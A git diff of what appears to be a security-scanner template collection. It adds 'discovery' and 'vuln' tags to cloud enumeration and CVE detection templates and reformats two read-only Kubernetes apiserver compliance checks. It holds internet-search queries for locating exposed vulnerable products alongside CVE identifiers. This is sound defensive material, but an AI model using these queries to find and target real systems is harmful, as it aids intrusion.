diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml index 15e667209b5..dd03ba5eff9 100644 --- a/cloud/enum/aws-app-enum.yaml +++ b/cloud/enum/aws-app-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,aws + tags: cloud,enum,cloud-enum,aws,discovery self-contained: true diff --git a/cloud/enum/aws-s3-bucket-enum.yaml b/cloud/enum/aws-s3-bucket-enum.yaml index 3460659526d..6678f3f0c7b 100644 --- a/cloud/enum/aws-s3-bucket-enum.yaml +++ b/cloud/enum/aws-s3-bucket-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,aws + tags: cloud,enum,cloud-enum,aws,discovery self-contained: true diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index cf24bac5a21..d7dfcd9a8d1 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,azure,dns + tags: cloud,enum,cloud-enum,azure,dns,discovery self-contained: true diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 6226417dafe..16441e07273 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure,fuzz,enum,dns + tags: cloud,cloud-enum,azure,fuzz,enum,dns,discovery self-contained: true diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml index 2a64b8556d5..56fdb35ebce 100644 --- a/cloud/enum/azure-website-enum.yaml +++ b/cloud/enum/azure-website-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,azure + tags: cloud,enum,azure,discovery self-contained: true diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml index 08ba7008ca3..f080c069119 100644 --- a/cloud/enum/gcp-app-engine-enum.yaml +++ b/cloud/enum/gcp-app-engine-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: enum,cloud,cloud-enum,gcp + tags: enum,cloud,cloud-enum,gcp,discovery self-contained: true diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml index 9b7e2edae3d..c9b52f1c120 100644 --- a/cloud/enum/gcp-bucket-enum.yaml +++ b/cloud/enum/gcp-bucket-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,gcp + tags: cloud,enum,cloud-enum,gcp,discovery self-contained: true diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml index 6b3e6afab2e..a0faa5cc67f 100644 --- a/cloud/enum/gcp-firebase-app-enum.yaml +++ b/cloud/enum/gcp-firebase-app-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: enum,cloud,cloud-enum,gcp + tags: enum,cloud,cloud-enum,gcp,discovery self-contained: true diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml index 24b822a55da..547b03ee303 100644 --- a/cloud/enum/gcp-firebase-rtdb-enum.yaml +++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: enum,cloud,cloud-enum,gcp + tags: enum,cloud,cloud-enum,gcp,discovery self-contained: true diff --git a/cloud/gcp/dns/gcloud-dns-dangling-records.yaml b/cloud/gcp/dns/gcloud-dns-dangling-records.yaml index 508c195fcbe..04e0879905b 100644 --- a/cloud/gcp/dns/gcloud-dns-dangling-records.yaml +++ b/cloud/gcp/dns/gcloud-dns-dangling-records.yaml @@ -12,7 +12,7 @@ info: Regularly audit your DNS records and associated IP addresses. Remove any DNS records that point to IP addresses no longer reserved under your Google Cloud account. reference: - https://cloud.google.com/dns/docs - tags: cloud,devops,gcp,gcloud,dns,gcp-cloud-config + tags: cloud,devops,gcp,gcloud,dns,gcp-cloud-config,discovery flow: | code(1) diff --git a/cloud/gcp/dns/gcloud-dns-dnssec-unenabled.yaml b/cloud/gcp/dns/gcloud-dns-dnssec-unenabled.yaml index 4dc8d54de89..2220f3694f0 100644 --- a/cloud/gcp/dns/gcloud-dns-dnssec-unenabled.yaml +++ b/cloud/gcp/dns/gcloud-dns-dnssec-unenabled.yaml @@ -12,7 +12,7 @@ info: Enable DNSSEC for each Google Cloud DNS managed zone through the Google Cloud Console or using the `gcloud dns managed-zones update` command with the `--dnssec-state=on` flag. reference: - https://cloud.google.com/dns/docs/dnssec - tags: cloud,devops,gcp,gcloud,dns,gcp-cloud-config + tags: cloud,devops,gcp,gcloud,dns,gcp-cloud-config,discovery flow: | code(1) diff --git a/cloud/gcp/dns/gcloud-dnssec-keysigning-rsasha1.yaml b/cloud/gcp/dns/gcloud-dnssec-keysigning-rsasha1.yaml index 570db50fcef..9327159c667 100644 --- a/cloud/gcp/dns/gcloud-dnssec-keysigning-rsasha1.yaml +++ b/cloud/gcp/dns/gcloud-dnssec-keysigning-rsasha1.yaml @@ -12,7 +12,7 @@ info: Update the DNSSEC configuration for each DNS managed zone to use more secure algorithms like RSASHA256 or ECDSAP256SHA256 for the Key-Signing Key (KSK). reference: - https://cloud.google.com/dns/docs/dnssec-config - tags: cloud,devops,gcp,gcloud,dns,dnssec,gcp-cloud-config + tags: cloud,devops,gcp,gcloud,dns,dnssec,gcp-cloud-config,discovery flow: | code(1) diff --git a/cloud/gcp/dns/gcloud-dnssec-zonesigning-rsasha1.yaml b/cloud/gcp/dns/gcloud-dnssec-zonesigning-rsasha1.yaml index 9a641870833..104d390de38 100644 --- a/cloud/gcp/dns/gcloud-dnssec-zonesigning-rsasha1.yaml +++ b/cloud/gcp/dns/gcloud-dnssec-zonesigning-rsasha1.yaml @@ -12,7 +12,7 @@ info: Update the DNSSEC configuration to use a stronger, more secure signing algorithm like RSASHA256 or ECDSAP256SHA256 for your DNS managed zones. reference: - https://cloud.google.com/dns/docs/dnssec-configuring - tags: cloud,devops,gcp,gcloud,dns,dnssec,gcp-cloud-config + tags: cloud,devops,gcp,gcloud,dns,dnssec,gcp-cloud-config,discovery flow: | code(1) diff --git a/cloud/kubernetes/security-compliance/k8s-apiserver-anonymous-access.yaml b/cloud/kubernetes/security-compliance/k8s-apiserver-anonymous-access.yaml index 7afb74d8266..883db51d77a 100644 --- a/cloud/kubernetes/security-compliance/k8s-apiserver-anonymous-access.yaml +++ b/cloud/kubernetes/security-compliance/k8s-apiserver-anonymous-access.yaml @@ -1,45 +1,45 @@ -id: k8s-apiserver-anonymous-access - -info: - name: Ensure kube-apiserver --anonymous-auth is explicitly disabled - author: songyaeji - severity: high - description: Checks whether kube-apiserver explicitly sets --anonymous-auth=false in its startup arguments. - impact: | - If --anonymous-auth is not explicitly disabled, anonymous unauthenticated requests might be allowed, - enabling unauthenticated access to cluster resources. - remediation: | - Edit the kube-apiserver manifest (e.g., /etc/kubernetes/manifests/kube-apiserver.yaml) or startup flags - and ensure "--anonymous-auth=false" is present in the apiserver arguments. - reference: - - https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/ - tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security - -variables: - argument: "--anonymous-auth=false" - -self-contained: true -code: - - engine: - - sh - - bash - source: | - kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" 2>/dev/null || \ - kubectl get pods -n kube-system -l k8s-app=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" 2>/dev/null || \ - kubectl get pods -n kube-system -o jsonpath="{.items[?(@.metadata.name.indexOf('kube-apiserver')>=0)].spec.containers[*].command}" 2>/dev/null || \ - echo "" - matchers-condition: and - matchers: - - type: word - words: - - 'kube-apiserver' - - type: word - words: - - "{{argument}}" - negative: true - - extractors: - - type: dsl - dsl: +id: k8s-apiserver-anonymous-access + +info: + name: Ensure kube-apiserver --anonymous-auth is explicitly disabled + author: songyaeji + severity: high + description: Checks whether kube-apiserver explicitly sets --anonymous-auth=false in its startup arguments. + impact: | + If --anonymous-auth is not explicitly disabled, anonymous unauthenticated requests might be allowed, + enabling unauthenticated access to cluster resources. + remediation: | + Edit the kube-apiserver manifest (e.g., /etc/kubernetes/manifests/kube-apiserver.yaml) or startup flags + and ensure "--anonymous-auth=false" is present in the apiserver arguments. + reference: + - https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/ + tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security + +variables: + argument: "--anonymous-auth=false" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" 2>/dev/null || \ + kubectl get pods -n kube-system -l k8s-app=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" 2>/dev/null || \ + kubectl get pods -n kube-system -o jsonpath="{.items[?(@.metadata.name.indexOf('kube-apiserver')>=0)].spec.containers[*].command}" 2>/dev/null || \ + echo "" + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + - type: word + words: + - "{{argument}}" + negative: true + + extractors: + - type: dsl + dsl: - '"kube-apiserver configuration does not explicitly set " + argument + ". This may allow anonymous access."' # digest: 490a004630440220400b5c65f92d20c1e43c6fd1832b52f91802eec0b70ab33eb9fb354f0a6d22d102200af5a11e626932f53faab18840f6ede44a22390a9525461c393917ef94c10310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/kubernetes/security-compliance/k8s-apiserver-token-auth-file.yaml b/cloud/kubernetes/security-compliance/k8s-apiserver-token-auth-file.yaml index dec274c072e..ad19b507c7a 100644 --- a/cloud/kubernetes/security-compliance/k8s-apiserver-token-auth-file.yaml +++ b/cloud/kubernetes/security-compliance/k8s-apiserver-token-auth-file.yaml @@ -1,43 +1,43 @@ -id: k8s-apiserver-token-auth-file - -info: - name: Detect kube-apiserver --token-auth-file usage - author: songyaeji - severity: high - description: Detects whether kube-apiserver includes the --token-auth-file startup argument. - impact: | - If the API server is started with --token-auth-file, static token file authentication may be allowed, which can enable long-lived or poorly managed tokens and weaken cluster authentication posture. - remediation: | - Remove the --token-auth-file argument from the kube-apiserver startup flags (e.g., edit - /etc/kubernetes/manifests/kube-apiserver.yaml) or ensure any tokens in that file are rotated - and managed securely. Prefer dynamic, short-lived service account tokens and RBAC. - reference: - - https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/ - tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security - -variables: - argument: "--token-auth-file" - -self-contained: true -code: - - engine: - - sh - - bash - source: | - kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" - - matchers-condition: and - matchers: - - type: word - words: - - 'kube-apiserver' - - - type: word - words: - - "{{argument}}" - - extractors: - - type: dsl - dsl: +id: k8s-apiserver-token-auth-file + +info: + name: Detect kube-apiserver --token-auth-file usage + author: songyaeji + severity: high + description: Detects whether kube-apiserver includes the --token-auth-file startup argument. + impact: | + If the API server is started with --token-auth-file, static token file authentication may be allowed, which can enable long-lived or poorly managed tokens and weaken cluster authentication posture. + remediation: | + Remove the --token-auth-file argument from the kube-apiserver startup flags (e.g., edit + /etc/kubernetes/manifests/kube-apiserver.yaml) or ensure any tokens in that file are rotated + and managed securely. Prefer dynamic, short-lived service account tokens and RBAC. + reference: + - https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/ + tags: cloud,devops,kubernetes,security,devsecops,api-server,k8s,k8s-cluster-security + +variables: + argument: "--token-auth-file" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + kubectl get pods -n kube-system -l component=kube-apiserver -o jsonpath="{.items[*].spec.containers[*].command}" + + matchers-condition: and + matchers: + - type: word + words: + - 'kube-apiserver' + + - type: word + words: + - "{{argument}}" + + extractors: + - type: dsl + dsl: - '"kube-apiserver is configured with " + argument + ". Review and remove if unnecessary."' # digest: 4a0a004730450220737e6128e9ff73a79b9b129d67e1148aaa730c68bb86d1c658e4306efcaf23bd022100ab19022ce7f606c83065496afdb5d6ed7666bbb6928e8fd580a0825345496fc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2014/CVE-2014-0160.yaml b/code/cves/2014/CVE-2014-0160.yaml index 2cb06aab935..7b33a14e41a 100644 --- a/code/cves/2014/CVE-2014-0160.yaml +++ b/code/cves/2014/CVE-2014-0160.yaml @@ -13,7 +13,7 @@ info: classification: epss-score: 0.94475 epss-percentile: 0.99997 - tags: cve,cve2014,openssl,heartbleed,code,kev,vkev + tags: cve,cve2014,openssl,heartbleed,code,kev,vkev,vuln variables: url: "{{RootURL}}" diff --git a/code/cves/2017/CVE-2017-1000353.yaml b/code/cves/2017/CVE-2017-1000353.yaml index 3df6dd5d390..ae1fb18759f 100644 --- a/code/cves/2017/CVE-2017-1000353.yaml +++ b/code/cves/2017/CVE-2017-1000353.yaml @@ -27,7 +27,7 @@ info: - product:"jenkins" - x-jenkins fofa-query: icon_hash=81586312 - tags: cve,cve2017,jenkins,rce,vkev,kev + tags: cve,cve2017,jenkins,rce,vkev,kev,vuln variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2019/CVE-2019-0604.yaml b/code/cves/2019/CVE-2019-0604.yaml index d0fa3d9079c..4dd8d0cd0ed 100644 --- a/code/cves/2019/CVE-2019-0604.yaml +++ b/code/cves/2019/CVE-2019-0604.yaml @@ -24,7 +24,7 @@ info: vendor: microsoft product: sharepoint shodan-query: cpe:"cpe:2.3:a:microsoft:sharepoint_server" - tags: cve,cve2019,sharepoint,microsoft,rce,kev,vkev + tags: cve,cve2019,sharepoint,microsoft,rce,kev,vkev,vuln variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index b442b396012..ea137e2ced7 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project + tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project,vuln self-contained: true code: diff --git a/code/cves/2020/CVE-2020-0646.yaml b/code/cves/2020/CVE-2020-0646.yaml index 496308109a3..19ccd08e2d2 100644 --- a/code/cves/2020/CVE-2020-0646.yaml +++ b/code/cves/2020/CVE-2020-0646.yaml @@ -24,7 +24,7 @@ info: product: .net_framework shodan-query: 'server:"ms .net remoting"' max-request: 1 - tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev,oast,vkev + tags: cve,cve2020,net-framework,sharepoint,microsoft,packetstorm,rce,kev,oast,vkev,vuln variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2020/CVE-2020-13935.yaml b/code/cves/2020/CVE-2020-13935.yaml index ea8143f7d01..ee98e54bbc7 100644 --- a/code/cves/2020/CVE-2020-13935.yaml +++ b/code/cves/2020/CVE-2020-13935.yaml @@ -24,7 +24,7 @@ info: shodan-query: html:"Apache Tomcat" vendor: apache product: tomcat - tags: cve,cve2020,tomcat,websocket,dos,code + tags: cve,cve2020,tomcat,websocket,dos,code,vuln flow: http(1) && code(1,2) && code (3) diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index 3e73859a89a..8d1d4920f9a 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project,vkev + tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project,vkev,vuln self-contained: true code: diff --git a/code/cves/2022/CVE-2022-42475.yaml b/code/cves/2022/CVE-2022-42475.yaml index 1f73c7d0f33..6308b4a5383 100644 --- a/code/cves/2022/CVE-2022-42475.yaml +++ b/code/cves/2022/CVE-2022-42475.yaml @@ -36,7 +36,7 @@ info: fofa-query: - body="/remote/login" "xxxxxxxx" - icon_hash="945408572" - tags: cve,cve2024,ssl-vpn,vpn,fortios,fortigate,heap-based,bufferoverflow,kev,vkev + tags: cve,cve2024,ssl-vpn,vpn,fortios,fortigate,heap-based,bufferoverflow,kev,vkev,vuln flow: http () && code() http: diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index d98010e2695..655026252b2 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -30,7 +30,7 @@ info: vendor: canonical product: ubuntu_linux shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux" - tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical,vkev + tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical,vkev,vuln self-contained: true code: diff --git a/code/cves/2023/CVE-2023-2986.yaml b/code/cves/2023/CVE-2023-2986.yaml index 36da3858983..dc644b4ef20 100644 --- a/code/cves/2023/CVE-2023-2986.yaml +++ b/code/cves/2023/CVE-2023-2986.yaml @@ -25,7 +25,7 @@ info: product: abandoned_cart_lite_for_woocommerce framework: wordpress fofa-query: body="/wp-content/plugins/woocommerce-abandoned-cart/" - tags: cve,cve2023,wordpress,woocommerce,wp-plugin,auth-bypass,woocommerce-abandoned-cart,vkev + tags: cve,cve2023,wordpress,woocommerce,wp-plugin,auth-bypass,woocommerce-abandoned-cart,vkev,vuln code: - engine: - php diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 8ba5dd3aa45..b50979718db 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -29,7 +29,7 @@ info: - http.title:"owncloud" fofa-query: title="owncloud" google-query: intitle:"owncloud" - tags: cve,cve2023,code,owncloud,auth-bypass + tags: cve,cve2023,code,owncloud,auth-bypass,vuln variables: username: admin diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index c0f33a209b2..a262e8c2136 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev,gnu,vkev + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev,gnu,vkev,vuln self-contained: true code: diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index d342e91bb48..26116e77fd5 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,linux,privesc,local,gnu + tags: cve,cve2023,code,glibc,linux,privesc,local,gnu,vuln self-contained: true code: diff --git a/code/cves/2024/CVE-2024-10443.yaml b/code/cves/2024/CVE-2024-10443.yaml index 54a46f19dcf..52ad4a2163e 100644 --- a/code/cves/2024/CVE-2024-10443.yaml +++ b/code/cves/2024/CVE-2024-10443.yaml @@ -23,7 +23,7 @@ info: product: photos framework: diskstation_manager shodan-query: html:"BeeStation" - tags: unauth,synology,rce,websocket,diskstation + tags: unauth,synology,rce,websocket,diskstation,vuln variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2024/CVE-2024-12356.yaml b/code/cves/2024/CVE-2024-12356.yaml index efa1d0d7729..732f1e5c98f 100644 --- a/code/cves/2024/CVE-2024-12356.yaml +++ b/code/cves/2024/CVE-2024-12356.yaml @@ -20,7 +20,7 @@ info: vendor: beyondtrust product: privileged_remote_access verified: true - tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access,kev,vkev + tags: cve,cve2024,beyondtrust,rce,remote-support,privileged-remote-access,kev,vkev,vuln code: - engine: diff --git a/code/cves/2024/CVE-2024-22120.yaml b/code/cves/2024/CVE-2024-22120.yaml index 408a04d80c3..ccaecfca68f 100644 --- a/code/cves/2024/CVE-2024-22120.yaml +++ b/code/cves/2024/CVE-2024-22120.yaml @@ -34,7 +34,7 @@ info: - app="zabbix-监控系统" && body="saml" - title="zabbix-server" google-query: intitle:"zabbix-server" - tags: cve,cve2024,authenticated,zabbix,sqli,vkev + tags: cve,cve2024,authenticated,zabbix,sqli,vkev,vuln variables: HOST: "{{Host}}" PORT: "{{Port}}" diff --git a/code/cves/2024/CVE-2024-3094.yaml b/code/cves/2024/CVE-2024-3094.yaml index 5dd059ae5a1..65ef319923a 100644 --- a/code/cves/2024/CVE-2024-3094.yaml +++ b/code/cves/2024/CVE-2024-3094.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: tukaani product: xz - tags: cve,cve2024,local,code,xz,backdoor,tukaani + tags: cve,cve2024,local,code,xz,backdoor,tukaani,vuln self-contained: true code: diff --git a/code/cves/2024/CVE-2024-4340.yaml b/code/cves/2024/CVE-2024-4340.yaml index 8a884b0cfb7..76ce95d7a24 100644 --- a/code/cves/2024/CVE-2024-4340.yaml +++ b/code/cves/2024/CVE-2024-4340.yaml @@ -14,7 +14,7 @@ info: epss-percentile: 0.94241 reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-4340 - tags: cve,cve2024,py,code,dos,python,sqlparse + tags: cve,cve2024,py,code,dos,python,sqlparse,vuln self-contained: true code: diff --git a/code/cves/2024/CVE-2024-45409.yaml b/code/cves/2024/CVE-2024-45409.yaml index ca2ed33c7f0..30162bfd786 100644 --- a/code/cves/2024/CVE-2024-45409.yaml +++ b/code/cves/2024/CVE-2024-45409.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.title:"GitLab" product: gitlab vendor: gitlab - tags: cve,cve2024,saml,auth-bypass,gitlab,code,vkev + tags: cve,cve2024,saml,auth-bypass,gitlab,code,vkev,vuln code: - engine: diff --git a/code/cves/2024/CVE-2024-55556.yaml b/code/cves/2024/CVE-2024-55556.yaml index c627ffff1e6..d1811247316 100644 --- a/code/cves/2024/CVE-2024-55556.yaml +++ b/code/cves/2024/CVE-2024-55556.yaml @@ -24,7 +24,7 @@ info: max-request: 2 shodan-query: 'http.title:"InvoiceShelf"' fofa-query: 'title="InvoiceShelf"' - tags: cve,cve2024,invoiceshelf,rce,deserialization + tags: cve,cve2024,invoiceshelf,rce,deserialization,vuln variables: marker: "{{randstr}}" diff --git a/code/cves/2024/CVE-2024-56331.yaml b/code/cves/2024/CVE-2024-56331.yaml index 64da37329ba..39cbe61eb7e 100644 --- a/code/cves/2024/CVE-2024-56331.yaml +++ b/code/cves/2024/CVE-2024-56331.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"Uptime Kuma" product: uptime-kuma vendor: uptime-kuma - tags: cve,cve2024,lfi,uptime-kuma,file-disclosure + tags: cve,cve2024,lfi,uptime-kuma,file-disclosure,vuln variables: username: "{{username}}" diff --git a/code/cves/2024/CVE-2024-9487.yaml b/code/cves/2024/CVE-2024-9487.yaml index 50d1b1f303e..856cb5f5a91 100644 --- a/code/cves/2024/CVE-2024-9487.yaml +++ b/code/cves/2024/CVE-2024-9487.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true shodan-query: title:"GitHub Enterprise" - tags: cve,cve2024,github,ghe,saml,auth-bypass,sso + tags: cve,cve2024,github,ghe,saml,auth-bypass,sso,vuln code: - engine: diff --git a/code/cves/2025/CVE-2025-22457.yaml b/code/cves/2025/CVE-2025-22457.yaml index 48a89cedef5..94e713c4ee9 100644 --- a/code/cves/2025/CVE-2025-22457.yaml +++ b/code/cves/2025/CVE-2025-22457.yaml @@ -31,7 +31,7 @@ info: fofa-query: title="ivanti connect secure" zoomeye-query: title:"ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: cve,cve2025,ivanti,intrusive,kev,vkev + tags: cve,cve2025,ivanti,intrusive,kev,vkev,vuln variables: HOST: "{{Host}}" diff --git a/code/cves/2025/CVE-2025-25291.yaml b/code/cves/2025/CVE-2025-25291.yaml index 405411e9a46..a8e346ec293 100644 --- a/code/cves/2025/CVE-2025-25291.yaml +++ b/code/cves/2025/CVE-2025-25291.yaml @@ -35,7 +35,7 @@ info: - body="gitlab-ci.yml" - title="gitlab" google-query: intitle:"gitlab" - tags: cve,cve2025,saml,auth-bypass,gitlab,code + tags: cve,cve2025,saml,auth-bypass,gitlab,code,vuln code: - engine: diff --git a/code/cves/2025/CVE-2025-32433.yaml b/code/cves/2025/CVE-2025-32433.yaml index 11203c279fc..de29dfed767 100644 --- a/code/cves/2025/CVE-2025-32433.yaml +++ b/code/cves/2025/CVE-2025-32433.yaml @@ -26,7 +26,7 @@ info: verified: true max-request: 1 shodan-query: "Erlang OTP" - tags: cve,cve2025,erlang,otp,ssh,rce,oast,kev,vkev + tags: cve,cve2025,erlang,otp,ssh,rce,oast,kev,vkev,vuln variables: OAST: "{{interactsh-url}}" diff --git a/code/cves/2025/CVE-2025-54309.yaml b/code/cves/2025/CVE-2025-54309.yaml index 00a32cc8b90..fe955298947 100644 --- a/code/cves/2025/CVE-2025-54309.yaml +++ b/code/cves/2025/CVE-2025-54309.yaml @@ -33,7 +33,7 @@ info: - icon_hash="-1022206565" zoomeye-query: title:"crushftp" google-query: intitle:"crushftp" - tags: cve,cve2025,crushftp,auth-bypass,race-condition,kev,vkev + tags: cve,cve2025,crushftp,auth-bypass,race-condition,kev,vkev,vuln variables: HOST: "{{Host}}" diff --git a/code/cves/2025/CVE-2025-6216.yaml b/code/cves/2025/CVE-2025-6216.yaml index 2f3f1d50126..aa1a8344a35 100644 --- a/code/cves/2025/CVE-2025-6216.yaml +++ b/code/cves/2025/CVE-2025-6216.yaml @@ -29,7 +29,7 @@ info: product: allegra shodan-query: http.favicon.hash:"284403119" fofa-query: icon_hash="284403119" - tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset + tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset,vuln variables: email: "admin@mydomainxxx.com" # Change to a test account diff --git a/code/windows/enumeration/rdp-ntlm-info.yaml b/code/windows/enumeration/rdp-ntlm-info.yaml index aa8470341d4..c8af2e1a6db 100644 --- a/code/windows/enumeration/rdp-ntlm-info.yaml +++ b/code/windows/enumeration/rdp-ntlm-info.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: code,rdp,ntlm,info,enum + tags: code,rdp,ntlm,info,enum,discovery variables: PORT: 3389 diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index b492f5fb01d..f008372c956 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 confidence: tenative - tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,vkev + tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,vkev,vuln http: - pre-condition: diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml index 9cba5044afe..286551df873 100644 --- a/dast/cves/2021/CVE-2021-45046.yaml +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 confidence: tenative - tags: cve,cve2021,rce,oast,log4j,injection,dast,kev,vkev + tags: cve,cve2021,rce,oast,log4j,injection,dast,kev,vkev,vuln http: - pre-condition: diff --git a/dast/cves/2022/CVE-2022-22965.yaml b/dast/cves/2022/CVE-2022-22965.yaml index 1d80ba4e6c3..38cc4f1150d 100644 --- a/dast/cves/2022/CVE-2022-22965.yaml +++ b/dast/cves/2022/CVE-2022-22965.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: vmware product: spring_framework - tags: packetstorm,cve,cve2024,dast,spring,rce,kev,vkev + tags: packetstorm,cve,cve2024,dast,spring,rce,kev,vkev,vuln http: - pre-condition: diff --git a/dast/cves/2022/CVE-2022-34265.yaml b/dast/cves/2022/CVE-2022-34265.yaml index 46e5e0626e2..bbeeb4458ef 100644 --- a/dast/cves/2022/CVE-2022-34265.yaml +++ b/dast/cves/2022/CVE-2022-34265.yaml @@ -17,8 +17,8 @@ info: cve-id: CVE-2022-34265 cwe-id: CWE-89 epss-score: 0.92734 - epss-percentile: 0.99743 - tags: sqli,dast,vulhub,cve,cve2022,django + epss-percentile: 0.99742 + tags: sqli,dast,vulhub,cve,cve2022,django,vuln variables: rand_string: '{{rand_text_alpha(15, "abc")}}' diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 6980e63a779..b3b6102d787 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -23,7 +23,7 @@ info: metadata: max-request: 1 confidence: tenative - tags: cve,cve2022,rce,oast,text4shell,dast,vkev + tags: cve,cve2022,rce,oast,text4shell,dast,vkev,vuln http: - pre-condition: diff --git a/dast/cves/2024/CVE-2024-2961.yaml b/dast/cves/2024/CVE-2024-2961.yaml index 014b6d7bc8f..8a46d87c64d 100644 --- a/dast/cves/2024/CVE-2024-2961.yaml +++ b/dast/cves/2024/CVE-2024-2961.yaml @@ -20,7 